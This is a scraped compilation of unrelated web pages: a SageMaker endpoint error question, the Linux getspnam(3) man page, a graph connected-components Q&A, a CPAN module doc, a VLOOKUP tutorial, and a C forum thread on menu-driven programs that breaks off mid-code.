(...) 174 as is. 175 """ 177 request_args = self._create_request_args( 178 data, 179 initial_args, (...) 183 custom_attributes, 184 ) --> 185 response = self.sagemaker_session.sagemaker_runtime_client.invoke_endpoint(**request_args) 186 return self._handle_response(response) File /opt/conda/lib/python3.10/site-packages/botocore/client.py:535, in ClientCreator._create_api_method.<locals>._api_call(self, *args, **kwargs) 531 raise TypeError( 532 f"{py_operation_name}() only accepts keyword arguments." 533 ) 534 # The "self" in this scope is referring to the BaseClient. --> 535 return self._make_api_call(operation_name, kwargs) File /opt/conda/lib/python3.10/site-packages/botocore/client.py:980, in BaseClient._make_api_call(self, operation_name, api_params) 978 error_code = parsed_response.get("Error", {}).get("Code") 979 error_class = self.exceptions.from_code(error_code) --> 980 raise error_class(parsed_response, operation_name) 981 else: 982 return parsed_response ModelError: An error occurred (ModelError) when calling the InvokeEndpoint operation: Received client error (400) from primary with message "{ "code": 400, "type": "InternalServerException", "message": "\u0027idefics\u0027" } ". What can I do to fix this issue and properly invoke the endpoint?
__label__pos
0.963202
Man Pages getspnam(3) - phpMan getspnam(3) - phpMan Command: man perldoc info search(apropos)   GETSPNAM(3) Linux Programmer's Manual GETSPNAM(3) NAME getspnam, getspnam_r, getspent, getspent_r, setspent, endspent, fgetspent, fgetspent_r, sgetspent, sgetspent_r, putspent, lckpwdf, ulckpwdf - get shadow password file entry SYNOPSIS /* General shadow password file API */ #include <shadow.h> struct spwd *getspnam(const char *name); struct spwd *getspent(void); void setspent(void); void endspent(void); struct spwd *fgetspent(FILE *fp); struct spwd *sgetspent(const char *s); int putspent(struct spwd *p, FILE *fp); int lckpwdf(void); int ulckpwdf(void); /* GNU extension */ #include <shadow.h> int getspent_r(struct spwd *spbuf, char *buf, size_t buflen, struct spwd **spbufp); int getspnam_r(const char *name, struct spwd *spbuf, char *buf, size_t buflen, struct spwd **spbufp); int fgetspent_r(FILE *fp, struct spwd *spbuf, char *buf, size_t buflen, struct spwd **spbufp); int sgetspent_r(const char *s, struct spwd *spbuf, char *buf, size_t buflen, struct spwd **spbufp); Feature Test Macro Requirements for glibc (see feature_test_macros(7)): getspent_r(), getspnam_r(), fgetspent_r(), sgetspent_r(): _BSD_SOURCE || _SVID_SOURCE DESCRIPTION Long ago it was considered safe to have encrypted passwords openly visible in the password file. When comput- ers got faster and people got more security-conscious, this was no longer acceptable. Julianne Frances Haugh implemented the shadow password suite that keeps the encrypted passwords in the shadow password database (e.g., the local shadow password file /etc/shadow, NIS, and LDAP), readable only by root. The functions described below resemble those for the traditional password database (e.g., see getpwnam(3) and getpwent(3)). The getspnam() function returns a pointer to a structure containing the broken-out fields of the record in the shadow password database that matches the username name. The getspent() function returns a pointer to the next entry in the shadow password database. The position in the input stream is initialized by setspent(). When done reading, the program may call endspent() so that resources can be deallocated. The fgetspent() function is similar to getspent() but uses the supplied stream instead of the one implicitly opened by setspent(). The sgetspent() function parses the supplied string s into a struct spwd. The putspent() function writes the contents of the supplied struct spwd *p as a text line in the shadow pass- word file format to the stream fp. String entries with value NULL and numerical entries with value -1 are written as an empty string. The lckpwdf() function is intended to protect against multiple simultaneous accesses of the shadow password database. It tries to acquire a lock, and returns 0 on success, or -1 on failure (lock not obtained within 15 seconds). The ulckpwdf() function releases the lock again. Note that there is no protection against direct access of the shadow password file. Only programs that use lckpwdf() will notice the lock. These were the functions that formed the original shadow API. They are widely available. Reentrant versions Analogous to the reentrant functions for the password database, glibc also has reentrant functions for the shadow password database. The getspnam_r() function is like getspnam() but stores the retrieved shadow pass- word structure in the space pointed to by spbuf. This shadow password structure contains pointers to strings, and these strings are stored in the buffer buf of size buflen. A pointer to the result (in case of success) or NULL (in case no entry was found or an error occurred) is stored in *spbufp. The functions getspent_r(), fgetspent_r(), and sgetspent_r() are similarly analogous to their non-reentrant counterparts. Some non-glibc systems also have functions with these names, often with different prototypes. Structure The shadow password structure is defined in <shadow.h> as follows: struct spwd { char *sp_namp; /* Login name */ char *sp_pwdp; /* Encrypted password */ long sp_lstchg; /* Date of last change (measured in days since 1 Jan 1970) */ long sp_min; /* Min # of days between changes */ long sp_max; /* Max # of days between changes */ long sp_warn; /* # of days before password expires to warn user to change it */ long sp_inact; /* # of days after password expires until account is disabled */ long sp_expire; /* Date when account expires (measured in days since 1 Jan 1970) */ unsigned long sp_flag; /* Reserved */ }; RETURN VALUE The functions that return a pointer return NULL if no more entries are available or if an error occurs during processing. The functions which have int as the return value return 0 for success and -1 for failure. For the non-reentrant functions, the return value may point to static area, and may be overwritten by subse- quent calls to these functions. The reentrant functions return zero on success. In case of error, an error number is returned. ERRORS ERANGE Supplied buffer is too small. FILES /etc/shadow local shadow password database file /etc/.pwd.lock lock file The include file <paths.h> defines the constant _PATH_SHADOW to the pathname of the shadow password file. CONFORMING TO The shadow password database and its associated API are not specified in POSIX.1-2001. However, many other systems provide a similar API. SEE ALSO getgrnam(3), getpwnam(3), getpwnam_r(3), shadow(5) COLOPHON This page is part of release 3.22 of the Linux man-pages project. A description of the project, and informa- tion about reporting bugs, can be found at http://www.kernel.org/doc/man-pages/. GNU 2008-07-09 GETSPNAM(3)
__label__pos
0.620969
62 453 Assignments Done 99,1% Successfully Done In June 2018 Answer to Question #15602 in Discrete Mathematics for Sujata Roy Question #15602 Formula to determine the number of connected components of a graph G. Expert's answer There isn&#039;t common formula to determine the number of connected components of an arbitrary graph. You can find the number of connected components algorithmically. Need a fast expert's response? Submit order and get a quick answer at the best price for any assignment or question with DETAILED EXPLANATIONS! Comments Assignment Expert 10.10.12, 16:18 It is straightforward to compute the connected components of a graph in linear time (in terms of the numbers of the vertices and edges of the graph) using either breadth-first search or depth-first search. In either case, a search that begins at some particular vertex v will find the entire connected component containing v (and no more) before returning. To find all the connected components of a graph, loop through its vertices, starting a new breadth first or depth first search whenever the loop reaches a vertex that has not already been included in a previously found connected component. There are also efficient algorithms to dynamically track the connected components of a graph as vertices and edges are added, as a straightforward application of disjoint-set data structures. These algorithms require amortized O(α(n)) time per operation, where adding vertices and edges and determining the connected component in which a vertex falls are both operations, and α(n) is a very slow-growing inverse of the very quickly growing Ackermann function. A related problem is tracking connected components as all edges are deleted from a graph, one by one; an algorithm exists to solve this with constant time per query, and O(|V||E|) time to maintain the data structure; this is an amortized cost of O(|V|) per edge deletion. For forests, the cost can be reduced to O(q + |V|log|V|), or O(log|V|) amortized cost per edge deletion. Sujata Roy 07.10.12, 10:37 Then sir please tell me about the algorithm. Leave a comment Ask Your question Submit Privacy policy Terms and Conditions
__label__pos
0.772423
Kent Fredric 🔥🐶🍵🔥 and 1 contributors NAME CPAN::Changes::Markdown::Filter::Node::PlainText - A text node that contains markup-free text. VERSION version 1.000002 SYNOPSIS use CPAN::Changes::Markdown::Filter::NodeUtil qw( :all ); my $plaintext = mk_node_plaintext("The text here"); $plaintext->to_s() # The text here $plaintext->content() # The text here METHODS create Slightly shorter hand for new $class->create( $text ) == $class->new( content => $text ) to_s Represent this node back as text. ATTRIBUTES content rw, required AUTHOR Kent Fredric <[email protected]> COPYRIGHT AND LICENSE This software is copyright (c) 2017 by Kent Fredric <[email protected]>. This is free software; you can redistribute it and/or modify it under the same terms as the Perl 5 programming language system itself.
__label__pos
0.560708
Excel Formula: Find Exact Value in 9th Column Formula: Find an exact value when you have 1 reference and a table to look in, where the value is found in the 9th column of the table. Formula Generator | 9 months ago In Excel, you can use the VLOOKUP function in Google Sheets to find an exact value when you have 1 reference and a table to look in. This formula is particularly useful when you want to search for a value in the 9th column of a table. The VLOOKUP function allows you to retrieve the value based on a specific reference. To use this formula, you need to provide the reference, the table range, the column index number, and specify an exact match. Let's explore how to use the VLOOKUP function with examples. The formula you can use in Google Sheets to find an exact value when you have 1 reference and a table to look in, where the value is found in the 9th column of the table is the VLOOKUP function. Here is the formula: =VLOOKUP(reference, table, 9, FALSE) Explanation: 1. reference is the value you want to find in the table. This can be a cell reference or a specific value. 2. table is the range of cells that contains the table you want to search in. The table should have at least 9 columns. 3. 9 represents the column index number where the value you want to retrieve is located. In this case, it is the 9th column. 4. FALSE indicates that you want an exact match. If the value is not found exactly, the formula will return an error. Examples: Let's say you have the following table: | A | B | C | D | E | F | G | H | I | |-------|-------|-------|-------|-------|-------|-------|-------|-------| | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | | Cat | Dog | Cow | Pig | Rat | Bat | Ant | Bee | Cow | | Lion | Tiger | Horse | Zebra| Bear | Lion | Wolf | Fox | Lion | If you want to find the value "Cow" in the 9th column, you can use the formula: =VLOOKUP("Cow", A1:I3, 9, FALSE) This formula will return "Cow" because it is found in the 9th column of the table. If you want to find the value "Lion" in the 9th column, you can use the formula: =VLOOKUP("Lion", A1:I3, 9, FALSE) This formula will return "Lion" because it is found in the 9th column of the table. If you want to find the value "Elephant" in the 9th column, you can use the formula: =VLOOKUP("Elephant", A1:I3, 9, FALSE) This formula will return an error because "Elephant" is not found exactly in the 9th column of the table. This article was generated with AI. AI can make mistakes, consider checking important information.
__label__pos
0.994612
0 I'd like to do this script in bash, so I can understand it and write it in python (that I know much less) later. I have some files in data. 3, nothing more. https://www.example.com/data/file27-1.jpg https://www.example.com/data/file51-2.jpg https://www.example.com/data/file2576-3.jpg URL='https://www.example.com/data/file' i=1 ; j=1 for i in {1..3000} ; do curl -I ${URL}file${i}-{j}.jpg # here, pipe result into grep, ### if !200 ((i++)) (so do nothing) ; ### if 200 wget $URL$i$j and ((j++)), and i=i-1 so I can have the same $i at the next loop, for a incremented $j " and go on into the the for loop done But curling for 3000 links individually takes some times. I'd like to parralelize the curl -I URL in some way, and when I get a 200 response, stop all process requesting as there won't be two files with the same $j value, add 1 to $j, and take everything back to appropriate values $i and $j and go on. I'm stuck at parallelizing (but found many threads on it), but the part that really blocks me is where a 200 would kill all curl processus, and then resume to the 200 OK $i and $j value. I hope I've been understandable. I didn't wrote a sample script yet, I'm looking into methods of achieving it. Thanks Edit #ps -ax | grep "curl" | grep -v "grep" | awk '{print $1}'| xargs kill -9 I figured out I can use that command to kill all curl request, that I can use in a if 200 condition, and then re-setting $i value with i=i-1, increment $j, and go on in the loop. But at this stage, nothing is parallelized : I can find out how, with xargs, I can parralel curl request, but I can't do it to increment its value. I think of a temporary file with URL generated in it, but I'd rather it to be generated as the script goes. 2 Answers 2 1 Here is a little snippet that can help you along with what you are trying to do, I hope the logic is fine : #!/bin/bash i=0 j=0 pid=0 ppid=0 #Enable job control; It's not used here but it can be usefull if you need to do more job control set -m for i in {1..3000} ; do #Execute each curl in the background to have a sort of multi-threading and get get the HEAD response status and put it in file descriptor 3 to be gathered later exec 3< <(curl -I ${URL}file${i}-{j}.jpg | head -n 1 | cut -d$' ' -f2) #Get the pid of the background job pid="$!" #Get the parent pid of the background job ppid="$(ps -o ppid= -p $pid)" #Gather the HTTP Response code status="$(cat <&3)" #Check if [ "$status" -eq 200 ] ; then i="$(($i - 1))" j="$(($j + 1))" echo "kill all previous background process by their parent" pkill -P $ppid else i="$(($i + 1))" fi echo " status : $status" echo " parent : $ppid" echo " child : $pid" done 2 • Oh my ! I just looked into it, haven't test it as it is since I have some more things to do with the vars but it has all the kind of feature I'd need (format date for i, hash for j...). I would edit your answer to put pkill before i and j dec in if [ "$status" -eq 200 ] tho, so background process won't change them in the short meantime. Also, As I see your code, I have some difficulty to understand how the [if] thing would be in the background. I do understand only the curl for current loop is, doesnt it ? I don't mark the topic answered for now, but I give you a "up" for that ! thanks Commented Dec 15, 2020 at 21:39 • I see . Normally the script should work correclty, [If] statement is on the foreground but it will be executed on each iteration and <status> variable will get the response everytime a background job ended. – Reda Salih Commented Dec 15, 2020 at 22:07 1 If you have GNU Parallel something like this should work (i=1..3000; j=1..1000): do_j() { j=$1 URL='https://www.example.com/data/file' seq 3000 | parallel --halt soon,success=1 -j100 "curl -I ${URL}file{}-${j}.jpg | grep 'HTTP.* 200 OK'" } export -f do_j seq 1000 | parallel -j1 do_j Adjust -j1 and -j100 to get more or fewer in parallel. You must log in to answer this question. Not the answer you're looking for? Browse other questions tagged .
__label__pos
0.638011
2) Calcolare le equazioni delle rette tangenti alla parabola nei suoi punti di intersezione con l'asse x Download (0) Loading.... (view fulltext now) Full text (1) Problema sulla parabola 1) Calcolare l'equazione della parabola di vertice V(2;2) e passante per A(4;0) 2) Calcolare le equazioni delle rette tangenti alla parabola nei suoi punti di intersezione con l'asse x 3) Detto P il punto di intersezione fra le rette calcolate nel punto 2, calcolare l'area del triangolo OPA 4) Calcolare la lunghezza della corda intercettata nella parabola dalla retta y=-x 5) Rappresentare graficamente Svolgimento 1) Formula parabola dato vertice: ( 2 ) 2 2 = ⋅ − a x y Sostituisco le coordinate di A ( 4 2 ) 2 2 0 − = a ⋅ −  2 = 1 a Equazione parabola: y x 2 x 2 1 2 + = 2) Punti di intersezione con asse x: 0 2 2 1 2 = + x x  x 1,2 = 0 ; 4 A(4;0);O(0;0) Tangente per A ( )    = + = ) 4 0 2 2 1 2 x m y x x y  x 2 x mx 4 m 2 1 2 = +  ( 2 ) 4 0 2 1 2 = + ⋅ + x x m m  ( ) 4 0 2 4 1 2 2  ⋅ =    − = S m m  0 8 4 4 − m + m 2 + m =  m 2 + m 4 + 4 = 0  2 m = Tangente per A: y = − 2 x + 8 Tangente per O    = + = mx y x x y 2 2 1 2  − x + 2 x = mx 2 1 2  ( 2 ) 0 2 1 2 = ⋅ + x x m  ( ) 0 0 2 4 1 2 2  ⋅ =    − = S m  ( 2 − m ) 2 = 0  m = 2 Tangente per O: y = 2 x 3) Calcolo delle coordinate di P:   = + = x y x y 2 8 2 P(2;4) Area del triangolo: base OA=4; altezza PH=4;area=8 4) Calcolo degli estremi della corda:    = + = x y x x y 2 2 1 2  − x + 2 x = − x 2 1 2  0 2 3 1 2 = + x x  0 2 3 1  =    − + x x  x 1,2 = 0 ; 6 C(6;-6); O(0;0) Lunghezza segmento OC ( 6 − 0 ) 2 + ( − 6 − 0 ) 2 = 72 = 6 2 ≈ 8 , 49 = OC 5) Figure Updating... References Related subjects :
__label__pos
0.977247
aboutsummaryrefslogtreecommitdiffstats path: root/wpa_supplicant/tests/test_md4.c blob: 4058486a7de11962cd6e43a1585f1aa62d15a0dd (plain) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 /* * Test program for MD4 (test vectors from RFC 1320) * Copyright (c) 2006, Jouni Malinen <[email protected]> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License version 2 as * published by the Free Software Foundation. * * Alternatively, this software may be distributed under the terms of BSD * license. * * See README and COPYING for more details. */ #include "includes.h" #include "common.h" #include "crypto/crypto.h" int main(int argc, char *argv[]) { struct { char *data; u8 *hash; } tests[] = { { "", "\x31\xd6\xcf\xe0\xd1\x6a\xe9\x31" "\xb7\x3c\x59\xd7\xe0\xc0\x89\xc0" }, { "a", "\xbd\xe5\x2c\xb3\x1d\xe3\x3e\x46" "\x24\x5e\x05\xfb\xdb\xd6\xfb\x24" }, { "abc", "\xa4\x48\x01\x7a\xaf\x21\xd8\x52" "\x5f\xc1\x0a\xe8\x7a\xa6\x72\x9d" }, { "message digest", "\xd9\x13\x0a\x81\x64\x54\x9f\xe8" "\x18\x87\x48\x06\xe1\xc7\x01\x4b" }, { "abcdefghijklmnopqrstuvwxyz", "\xd7\x9e\x1c\x30\x8a\xa5\xbb\xcd" "\xee\xa8\xed\x63\xdf\x41\x2d\xa9" }, { "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" "0123456789", "\x04\x3f\x85\x82\xf2\x41\xdb\x35" "\x1c\xe6\x27\xe1\x53\xe7\xf0\xe4" }, { "12345678901234567890123456789012345678901234567890" "123456789012345678901234567890", "\xe3\x3b\x4d\xdc\x9c\x38\xf2\x19" "\x9c\x3e\x7b\x16\x4f\xcc\x05\x36" } }; unsigned int i; u8 hash[16]; const u8 *addr[2]; size_t len[2]; int errors = 0; for (i = 0; i < sizeof(tests) / sizeof(tests[0]); i++) { printf("MD4 test case %d:", i); addr[0] = tests[i].data; len[0] = strlen(tests[i].data); md4_vector(1, addr, len, hash); if (memcmp(hash, tests[i].hash, 16) != 0) { printf(" FAIL"); errors++; } else printf(" OK"); if (len[0]) { addr[0] = tests[i].data; len[0] = strlen(tests[i].data); addr[1] = tests[i].data + 1; len[1] = strlen(tests[i].data) - 1; md4_vector(1, addr, len, hash); if (memcmp(hash, tests[i].hash, 16) != 0) { printf(" FAIL"); errors++; } else printf(" OK"); } printf("\n"); } return errors; }
__label__pos
0.834576
9. Managing Your Library In the last chapter, we covered concepts and tasks that enhance your listening and viewing experience. In this chapter, we move to those topics that impact what happens in iTunes when you’re not playing anything but, rather, when you’re organizing, searching, updating, or otherwise managing your library. A song is not just music (and podcasts and audiobooks are not just spoken words); each item in your library has information associated with it. This information affects how things look, how you can find specific content, and how files are stored on your hard drive. Thus, in this chapter we cover the ins and outs of how your library “works”: the important role of song information, how you can edit that information, and ... Get iTunes 6 and iPod for Windows and Macintosh: Visual QuickStart Guide now with O’Reilly online learning. O’Reilly members experience live online training, plus books, videos, and digital content from 200+ publishers.
__label__pos
0.51338
Setting user mode break points from KD aka .process /i vs .process /r /p debug When performing KD(Kernel Debugging) in Windows with Windbg if you have to set a break point in a user mode process we should always use .process /i address; g; .reload /user. Lot of good content is written on the internet on this command, but nothing seemed to explain why this command should be used instead of the familiar .process /r /p address. I would like to shed some light on this. Before reading any further I would strongly encourage you to read about it from above link. In this article I assume some basic knowledge on how kernel debugging is done with Windbg. Also, I would like to start with the following question. If the debugger has read/write access to the user mode process via .process /r /p why cannot it insert int 3 in user mode process when performing KD? Why do we have to make the user mode process the current process context by running .process /i ? Read on → How does breakpoints work in debuggers? debugIt’s been a while, I have got a chance to blog about low-level stuff. In this article, I am going to explain how breakpoints work in debuggers. I am assuming the reader is already familiar with “what a breakpoint is?” and how to set it in your debugger of choice. The goal of this post is to explain the interplay between Debugger, Debuggee, Operating System and the CPU. Read on → A newbie’s introduction to compilers and reverse engineering gccegg-65Compilers are surely the complex programs of all times. Even today, writing a compiler with minimum set of tools is considered to be challenging. This tutorial scratches the surface of different compiler phases involved in translating a given source code to executable and also shows how this information is useful in context of reverse engineering. I tried my best not to confuse the reader with too much of jargon, and help any newbie to get up to the speed. Read on → What does it take to write an emulator in Java? I am proud, This weekend I did some productive work. I was able to code Chip 8 emulator in Java over a night 😉 I have always been fascinated by them and finally I was able to get the damn thing to work! For those of you who are not familiar with software emulator, It is a software which can emulate the functionality of other hardware or software components. Notable examples are video game emulators(Dosbox/NES Emulator), general purpose software emulators(QEmu) Read on →
__label__pos
0.994191
[texhax] Referencing a section title Luis Alejandro Cortes luico at ida.liu.se Fri Sep 10 09:28:16 CEST 2004 Dear all, I need to make a reference to the title of a section (not just its number). If I have \section{NiceTitle} \label{sec:mysection} it is clear that \ref{sec:mysection} produces the number of the section. But what if I want to get the title itself? I want of course to avoid doing it manually (retyping 'NiceTitle' in the part of the text I need it). /LAC More information about the texhax mailing list
__label__pos
0.862751
top of page Wix Blog How Much Does a Domain Name Cost? Resource Get Enterprise Grade Website Security Resource Access Secure Web Hosting .center domain   Domain extensions, also known as top-level domains (TLDs), are the suffixes at the end of a web address. Some of the most well-known ones are .com, .org or .net. TLDs are important because they help define the purpose or nature of a website and contribute to the overall identity of a web address. The .center domain extension was introduced in 2014 to provide an additional TLD that could be used for a variety of purposes. It serves as an inclusive platform for diverse content, accommodating various industries, communities or entities seeking a central online presence. This is a great choice if your .com, .org and .net domain name is already taken. Learn more: Why use the .center domain extension? Versatility: .center is versatile and can be used for various types of websites, making it suitable for businesses, organizations or individuals. Memorability: It can help make a web address more memorable by providing a clear indication of the central theme or focus of the website. Who uses the .center domain extension? The .center TLD is designed to cater to various purposes and doesn't confine itself to any specific industry or niche. Here are some examples of some of the ways it can be used: • Businesses or organizations who want to emphasize a central location or focus. • Educational institutions or training centers. • Convention centers, function rooms or event halls.  • Event organizing companies.   You may also be interested in:   How to register .center 01. Choose a domain registrar Select a domain registrar like Wix that offers registration services for .center domains.  02. Check for availability Use the registrar's domain name search tool to check if your desired .center domain is available. 03. Submit your information Complete the registration process by providing any necessary information, including contact details. 04. Complete payment Make the required payment to complete the registration process. Learn more: .center domain extension FAQ Can I use .center for any type of website? Yes, .center is versatile and can be used for various purposes, including businesses, organizations and personal websites. How does .center differ from .com? .center is often more specific, indicating a central theme or hub while .com is a general-purpose domain widely used for commercial websites. Are there any restrictions on registering a .center domain? Generally, .center has no specific restrictions but individual registrars may have their own policies. Can I transfer an existing .center domain to another registrar? Yes, domain transfers are possible. Consult your current registrar and the new registrar for guidance on the process. Related Term .ca domain Related Term .co domain Ready to create your own website? The latest trends in business, marketing & web design. Delivered straight to your inbox. Thanks for submitting! bottom of page
__label__pos
0.950948
How can I get sum of total values from cells in DataGridView? I want it to look like this Column1 Column2 Column3 Column4 String ---- String ---- String ---- 10 String ---- String ---- String ---- 7 String ---- String ---- String ---- 3 String ---- String ---- String ---- 5 I want to get number 25 (Sum from Column4). Thanks. Give this a try: Remember that the column nubering is zero index based (Column4 = index 3) Dim sum As Int32 = (From dgvrow In DataGridView1.Rows _ Select CInt(CType(dgvrow, DataGridViewRow).Cells(3).Value)) _ .Sum() Edited 4 Years Ago by TnTinMN Try this code and put it on a Button Dim sum As Double = 0 For i = 0 To DatagridView1.RowCount - 1 sum += DatagridView1.Rows(i).Cells("ColumnName").Value() 'put your Column Name here. Next TextBox1.text = sum 'the result will display in a TextBox This works for me, even if there is text in one or more of the cells On Error Resume Next For i = 0 To DataGridView1.CurrentRow.Index sum = sum + DataGridView1.Rows(i).Cells("Column3").Value Next i the cells This question has already been answered. Start a new discussion instead.
__label__pos
0.815866
Loading pngs Luminary Posts: 5,143 Joined: 2002.04 Post: #16 ImageIO was introduced with 10.4. Quote this message in a reply Member Posts: 194 Joined: 2009.02 Post: #17 AnotherJake Wrote:For something that works on both iPhone and Mac to load a PNG, you can do something like this (I just kind of threw it together real quick, so it's pseudocode-ish, but you should be able to figure it out from here): Code: NSURL *url = [NSURL fileURLWithPath:myPath]; if (url == NULL) {     NSLog(@"%s ERROR: Unable to create URL", __FUNCTION__);     return; } CGDataProviderRef source = CGDataProviderCreateWithURL((CFURLRef)url); if (source == NULL) {     printf("%s ERROR: Unable to create data provider from file URL", __FUNCTION__);     return; } CGImageRef image = CGImageCreateWithPNGDataProvider(source, nil, NO, kCGRenderingIntentDefault); if(image == NULL) {     NSLog(@"%s ERROR: unable to load: %@.%@", __FUNCTION__, texture[texID].file, extension);     CGDataProviderRelease(source);     return; } CGSize imageSize = CGSizeMake(CGImageGetWidth(image), CGImageGetHeight(image)); NSUInteger width = imageSize.width; NSUInteger height = imageSize.height; CGColorSpaceRef colorSpace = CGColorSpaceCreateDeviceRGB(); void *pixels = calloc(width * height * 4, 1); CGContextRef context = CGBitmapContextCreate(pixels, width, height, 8, 4 * width, colorSpace, kCGImageAlphaPremultipliedLast | kCGBitmapByteOrder32Big); CGColorSpaceRelease(colorSpace); CGContextDrawImage(context, CGRectMake(0, 0, width, height), image); I don't know if this works on 10.4 though. I don't target 10.4 anymore since I've seen too much anecdotal evidence that few use it anymore. Thanks a lot. The code works except that it's drawing everything rotated 180 degrees, upside down and backwards, is there some way to flip the context or image? Quote this message in a reply Moderator Posts: 3,591 Joined: 2003.06 Post: #18 NelsonMandella Wrote:Thanks a lot. The code works except that it's drawing everything rotated 180 degrees, upside down and backwards, is there some way to flip the context or image? Picky! Rasp The flipY stuff is the only mod you should need: Code: colorSpace = CGColorSpaceCreateDeviceRGB(); pixels = calloc(width * height * 4, 1); context = CGBitmapContextCreate(pixels, width, height, 8, 4 * width, colorSpace, kCGImageAlphaPremultipliedLast | kCGBitmapByteOrder32Big); CGColorSpaceRelease(colorSpace); if (flipY) {     CGContextTranslateCTM(context, 0, (float)(height));     CGContextScaleCTM(context, 1.0, -1.0); } CGContextDrawImage(context, CGRectMake(0, 0, width, height), image); Quote this message in a reply Member Posts: 194 Joined: 2009.02 Post: #19 Perfect! Thanks so much for the help. Quote this message in a reply Member Posts: 260 Joined: 2005.05 Post: #20 I have switched to pnglite for my PNG loading problems. Much less trouble than libpng IMHO. http://www.karlings.com/~danne/pnglite/ Quote this message in a reply Moderator Posts: 3,591 Joined: 2003.06 Post: #21 Ingemar Wrote:I have switched to pnglite for my PNG loading problems. Much less trouble than libpng IMHO. http://www.karlings.com/~danne/pnglite/ Looks nice. Does it work on iPhone too? Quote this message in a reply Member Posts: 260 Joined: 2005.05 Post: #22 AnotherJake Wrote:Looks nice. Does it work on iPhone too? I havn't tried that myself. But I wouldn't expect that to be a problem. Quote this message in a reply Post Reply 
__label__pos
0.687533
Trisquel GNU/Linux OS ? Discussion in 'all things UNIX' started by CloneRanger, Jun 15, 2013. Thread Status: Not open for further replies. 1. CloneRanger CloneRanger Registered Member Joined: Jan 4, 2006 Posts: 4,844 I've never heard of it before ! Easy to use sounds good :) Anybody tried it, or uses it ? If so what's it like, & how does it compare with other Linux OS's ? *   2. moontan moontan Registered Member Joined: Sep 11, 2010 Posts: 3,931 Location: Québec 3. Kerodo Kerodo Registered Member Joined: Oct 5, 2004 Posts: 7,798 Maybe "old", but most likely more stable....   4. moontan moontan Registered Member Joined: Sep 11, 2010 Posts: 3,931 Location: Québec right you are. every times there's a change to the kernel you got to hold your breath and pray everything's gonna be right. :p anyway, the reviewer seems to like it a lot, so certainly worth considerations.   5. Trespasser Trespasser Registered Member Joined: Mar 1, 2005 Posts: 1,195 Location: Virginia - Appalachian Mtns I've tried it before a year or two back. If I recall correctly it doesn't use any proprietary applications. It follows the free foundation philosophy. I wasn't too impressed with it. Correct me if I'm wrong. Later...   Loading... Thread Status: Not open for further replies.
__label__pos
0.746138
Creating Interactive Application (Novice Question) This is a discussion on Creating Interactive Application (Novice Question) within the C Programming forums, part of the General Programming Boards category; Hello, I just recently decided to dive into the world of C Programming and I cannot think of a better ... 1. #1 Registered User Join Date Dec 2012 Posts 2 Question Creating Interactive Application (Novice Question) Hello, I just recently decided to dive into the world of C Programming and I cannot think of a better way to provide myself with more experience by writing longer applications with multiple functions than just "Hello World!" (I am sorry as I do not know the technical jargon yet so I will try and explain my goal as much as possible and hope it is understood) I want to write a simple application which will preform different action based on different input. For example I would want say 5 options, 5 different keys to choose from, say 1 - 5. How would I give different functions to different keys? So if someone choose "1" that it would preform actions from "1" and not say "2". So I am trying to have different actions or maybe even multiple actions or functions linked through a pathway which have different end results -- as in say clicking "1" could take you to a whole new set of actions to choose from that "2" would never take you too. Now it would take all the fun out of trying to create the application if someone did it for me, I just need help figuring out how to link functions and actions to different functions and actions -- and possibly a way for the application to recognize if imputed characters are valid or invalid (so if someone theoretically typed in "6" it would bounce back and say invalid selection). So nothing too complicated, but my goal is to create an app with limited interactivity between the user and program; I think this will be the best way to experiment with the powers of Programming. Last edited by Nick Colby; 12-22-2012 at 05:54 PM. Reason: Improved Read-ability 2. #2 Registered User Join Date Jun 2011 Posts 3,005 I'm a little unclear on exactly what you're asking. Assuming you've done the "hello world" example, you know that the journey of C/C++ programming pretty much starts out with basic console [text] programs. In this case, making simple menu driven programs can be achieved early on in the learning process. It's a simple combination of reading user input, and applying basic logic to determine which code to execute. After you get your feet wet with basic I/O, conditional statements, and loops, you can easily code a program that meets the requirements you describe. It's also possible you mean that pressing a certain key will make your OS perform a certain action (i.e. run another program, copy a file, etc). This, too, is possible, but more advanced. Learning on your own is always best done with the help of a good introduction to programming book. After reading the material, trying out the example code, and doing any exercises provided, you will get a better sense of how to program, as well as what you'll eventually be able to achieve with programming. Does any of this help answer your questions? 3. #3 Registered User Join Date Dec 2012 Posts 2 Quote Originally Posted by Matticus View Post I'm a little unclear on exactly what you're asking. Assuming you've done the "hello world" example, you know that the journey of C/C++ programming pretty much starts out with basic console [text] programs. In this case, making simple menu driven programs can be achieved early on in the learning process. It's a simple combination of reading user input, and applying basic logic to determine which code to execute. After you get your feet wet with basic I/O, conditional statements, and loops, you can easily code a program that meets the requirements you describe. It's also possible you mean that pressing a certain key will make your OS perform a certain action (i.e. run another program, copy a file, etc). This, too, is possible, but more advanced. Learning on your own is always best done with the help of a good introduction to programming book. After reading the material, trying out the example code, and doing any exercises provided, you will get a better sense of how to program, as well as what you'll eventually be able to achieve with programming. Does any of this help answer your questions? Actually yes it does, thank you. I guess everything I need to learn to accomplish this application is in the field of I/O. You mention that C/C++ starts out with basic console output, but is it always going to be based in the console? Would I use C to create GUI interfaces or have I missed the purpose of The C Language? 4. #4 Registered User Join Date Jun 2011 Posts 3,005 You can use C/C++ to create GUIs, though this would be a more advanced level of programming. The reason C/C++ learning usually starts in the console is because the console is relatively simple, and interacting with it does not require much code on the programmers part. This makes it a good introduction and a natural lead-in to more sophisticated programs. Once you are familiar with the rules and syntax of the language, you can use these coding skills in conjunction with pre-existing libraries to create, well, all sorts of programs. 5. #5 Registered User Join Date Nov 2012 Posts 1,255 Quote Originally Posted by Nick Colby View Post I want to write a simple application which will preform different action based on different input. For example I would want say 5 options, 5 different keys to choose from, say 1 - 5. How would I give different functions to different keys? So if someone choose "1" that it would preform actions from "1" and not say "2". It sounds like you want a multi-way decision. In C the normal way is either a switch statement or an if ... else if ... else if ... else sequence. One simple example: suppose you have read the code you described as a digit '1'...'3' and you have already defined three functions action_one, action_two, action_three. Then you could run something like this in a loop: Code: switch(code) { case '1': action_one(); break; case '2': action_two(); break; case '3': 